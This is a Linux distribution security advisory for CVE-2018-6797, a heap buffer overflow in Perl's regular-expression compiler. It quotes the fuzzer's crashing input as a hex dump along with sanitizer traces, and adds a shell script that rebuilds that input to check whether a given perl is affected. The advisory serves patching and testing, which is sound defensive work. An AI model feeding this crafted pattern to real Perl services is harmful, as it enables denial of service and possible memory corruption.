CLD-360 Details

Other IDs this deficiency may be known by:

CVE ID: CVE-2018-6797 (tracked at NVD, MITRE, Debian, Arch Linux, Red Hat, SUSE, Ubuntu)
Other ID(s)

Basic Information:

Affected Package(s) perl
Deficiency Type SECURITY
Date Created 2018-04-14 11:59:43
Date Last Modified 2018-04-14 15:46:46

Version Specific Information:

Cucumber 1.0 i686 waiting for upstream to publish patch
Cucumber 1.0 x86_64 waiting for upstream to publish patch

Cucumber 1.1 i686 fixed in perl-5.26.2-i686-1
Cucumber 1.1 x86_64 fixed in perl-5.26.2-x86_64-1

Details:

=================================== Overview ===================================

Heap-buffer-overflow (WRITE of size 1) in S_regatom (regcomp.c), the regular
expression compiler, reachable from a crafted regular expression. The confirmed
impact is a denial of service (Perl panic or crash while the pattern is
compiled); the upstream description additionally notes that the attacker has
control over the bytes written.

================================ Initial Report ================================

From https://rt.perl.org/Public/Bug/Display.html?id=132227:

Triggered while fuzzing Perl v5.27.4-29-gdc41635.

od -tx1 ./test514
0000000 2f 30 30 5c 4e 7b 55 2b 30 7d df df df df df df
0000020 df 30 30 30 df df 30 2f 69
0000031

==28186==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000ac58 at pc 0x000000846c2d bp 0x7ffe716bc7f0 sp 0x7ffe716bc7e0
WRITE of size 1 at 0x60700000ac58 thread T0
    #0 0x846c2c in S_regatom /root/perl/regcomp.c:13652
    #1 0x8587f6 in S_regpiece /root/perl/regcomp.c:11708
    #2 0x8587f6 in S_regbranch /root/perl/regcomp.c:11633
    #3 0x88830a in S_reg /root/perl/regcomp.c:11371
    #4 0x8c90dc in Perl_re_op_compile /root/perl/regcomp.c:7363
    #5 0x5297d0 in Perl_pmruntime /root/perl/op.c:5888
    #6 0x74d853 in Perl_yyparse /root/perl/perly.y:1210
    #7 0x58b9b8 in S_parse_body /root/perl/perl.c:2450
    #8 0x593622 in perl_parse /root/perl/perl.c:1753
    #9 0x42eb7d in main /root/perl/perlmain.c:121
    #10 0x7fba4cebe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #11 0x42fe18 in _start (/root/perl/perl+0x42fe18)

0x60700000ac58 is located 0 bytes to the right of 72-byte region [0x60700000ac10,0x60700000ac58)
allocated by thread T0 here:
    #0 0x7fba4dc62602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x92dfd4 in Perl_safesysmalloc /root/perl/util.c:153
    #2 0x8c6cbe in Perl_re_op_compile /root/perl/regcomp.c:7209
    #3 0x5297d0 in Perl_pmruntime /root/perl/op.c:5888
    #4 0x74d853 in Perl_yyparse /root/perl/perly.y:1210
    #5 0x58b9b8 in S_parse_body /root/perl/perl.c:2450
    #6 0x593622 in perl_parse /root/perl/perl.c:1753
    #7 0x42eb7d in main /root/perl/perlmain.c:121
    #8 0x7fba4cebe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/perl/regcomp.c:13652 S_regatom

When tested against Perl 5.22.1 under Valgrind, the following occurs:

==5420== Invalid write of size 1
==5420==    at 0x52F178: Perl__to_fold_latin1 (in /usr/bin/perl)
==5420==    by 0x532904: Perl__to_uni_fold_flags (in /usr/bin/perl)
==5420==    by 0x4826E7: ??? (in /usr/bin/perl)
==5420==    by 0x48479C: ??? (in /usr/bin/perl)
==5420==    by 0x4798EA: ??? (in /usr/bin/perl)
==5420==    by 0x48E942: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==  Address 0x5b9dd88 is 0 bytes after a block of size 72 alloc'd
==5420==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5420==    by 0x498241: Perl_safesysmalloc (in /usr/bin/perl)
==5420==    by 0x48E5B4: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==
==5420== Invalid write of size 1
==5420==    at 0x52F17B: Perl__to_fold_latin1 (in /usr/bin/perl)
==5420==    by 0x532904: Perl__to_uni_fold_flags (in /usr/bin/perl)
==5420==    by 0x4826E7: ??? (in /usr/bin/perl)
==5420==    by 0x48479C: ??? (in /usr/bin/perl)
==5420==    by 0x4798EA: ??? (in /usr/bin/perl)
==5420==    by 0x48E942: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==  Address 0x5b9dd89 is 1 bytes after a block of size 72 alloc'd
==5420==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5420==    by 0x498241: Perl_safesysmalloc (in /usr/bin/perl)
==5420==    by 0x48E5B4: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==
==5420== Invalid write of size 1
==5420==    at 0x482311: ??? (in /usr/bin/perl)
==5420==    by 0x48479C: ??? (in /usr/bin/perl)
==5420==    by 0x4798EA: ??? (in /usr/bin/perl)
==5420==    by 0x48E942: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==  Address 0x5b9dd8c is 4 bytes after a block of size 72 alloc'd
==5420==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5420==    by 0x498241: Perl_safesysmalloc (in /usr/bin/perl)
==5420==    by 0x48E5B4: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==
panic: reg_node overrun trying to emit 0, 5b9dd90>=5b9dd88 at test514 line 1

============================ Additional Information ============================

See the entire thread at https://rt.perl.org/Public/Bug/Display.html?id=132227.

================================= Our Analysis =================================

----- Affected Products -----
We have verified in our lab environment that Perl 5.22.4 and 5.26.1 are both
vulnerable to this. These are the Perl versions originally packaged in Cucumber
Linux 1.0 and 1.1 respectively.

----- Scope and Impact of this Vulnerability -----
An attacker who can supply a regular expression that the target Perl process
compiles (for example, a pattern interpolated unescaped from untrusted input)
can cause a denial of service: the process panics or crashes during regex
compilation, as in the traces above. The attacker must control the pattern
itself, not merely the string being matched against it. Upstream's description
states that the attacker also controls the bytes written past the buffer, so a
more serious impact cannot be ruled out; we have only confirmed the denial of
service.

----- Testing if you are Affected -----
You can test whether the Perl on your system is affected by running the Perl
script from https://rt.perl.org/Ticket/Attachment/1528262/815123/132227b.pl
with that interpreter. If it dies with a Perl panic (for Perl 5.22.1 the message
is the "panic: reg_node overrun" line shown in the Valgrind output above), you
are affected.
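The check described above, as an added example that is not part of the original
advisory or of the Perl project: it rebuilds the 25-byte fuzzer input test514
from the od dump quoted in the initial report, so it can be run offline without
fetching 132227b.pl, and runs it against a chosen perl binary, classifying the
result from the exit status and stderr. The function names (test514_bytes,
test514_hex, classify_run, check_perl) are ours. The attached 132227b.pl is not
reproduced on this page and may differ from this reconstruction.

```shell
#!/bin/sh
# Added example for CLD-360 (not from the Cucumber Linux advisory or the
# Perl project): rebuild the fuzzer reproducer "test514" from the od(1) dump
# in the initial report and run it against a chosen perl binary.
#
# Bytes from the dump: "/00\N{U+0}" + 7 x 0xdf + "000" + 2 x 0xdf + "0/i".
# 0xdf is LATIN SMALL LETTER SHARP S in Latin-1; under Unicode rules (which
# \N{} forces) it case-folds to the two-character sequence "ss", which is
# consistent with the Valgrind trace showing the out-of-bounds writes coming
# from Perl__to_fold_latin1.

# Write the 25-byte reproducer to stdout. Octal \337 is 0xdf.
test514_bytes() {
    printf '/00\\N{U+0}\337\337\337\337\337\337\337000\337\3370/i'
}

# Lowercase hex rendering of the reproducer (no separators), so it can be
# compared byte for byte with the od dump in the report.
test514_hex() {
    test514_bytes | od -An -v -tx1 | tr -d ' \n'
}

# Classify one perl run from its exit status ($1) and a file holding its
# stderr ($2). Prints one of: vulnerable | crashed | clean
classify_run() {
    status=$1
    err=$2
    if grep -q 'panic: reg_node overrun' "$err"; then
        echo vulnerable          # the panic seen on unpatched 5.22.1 above
    elif grep -q 'AddressSanitizer: heap-buffer-overflow' "$err"; then
        echo vulnerable          # an ASan-instrumented build
    elif [ "$status" -ge 128 ]; then
        echo crashed             # killed by a signal (e.g. SIGSEGV, SIGABRT)
    else
        echo clean
    fi
}

# Run the reproducer with the given perl binary (default: perl on PATH) and
# print the classification. Safe under "set -e": a failing perl does not
# abort the script.
check_perl() {
    perl_bin=${1:-perl}
    work=$(mktemp -d) || return 2
    test514_bytes > "$work/test514"
    status=0
    "$perl_bin" "$work/test514" > /dev/null 2> "$work/err" || status=$?
    result=$(classify_run "$status" "$work/err")
    rm -rf "$work"
    echo "$result"
}

# Usage: check_perl /usr/bin/perl
```

A "clean" result only means this particular input did not produce a visible
failure on that build: a one-byte heap overwrite in a non-instrumented binary
may leave no trace, so the authoritative check remains the Perl version
(5.26.2 or later, or a build carrying the upstream commit).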

----- Fix for this Vulnerability -----
For Perl 5.26, this vulnerability can be fixed by upgrading to Perl 5.26.2 or by
applying the patch from commit
https://perl5.git.perl.org/perl.git/commitdiff/abe1e6c568b96bcb382dfa4f61c56d1ab001ea51.

For Perl 5.22, the patch is not easily backportable and the Perl developers have
expressed that they do not intend to make a patch for it, despite Perl 5.22
still being "officially supported." We are looking for a way to fix this for
Perl 5.22.

================================= Our Solution =================================

Cucumber Linux 1.1:
We have upgraded to Perl 5.26.2.

Cucumber Linux 1.0:
We are searching for a solution.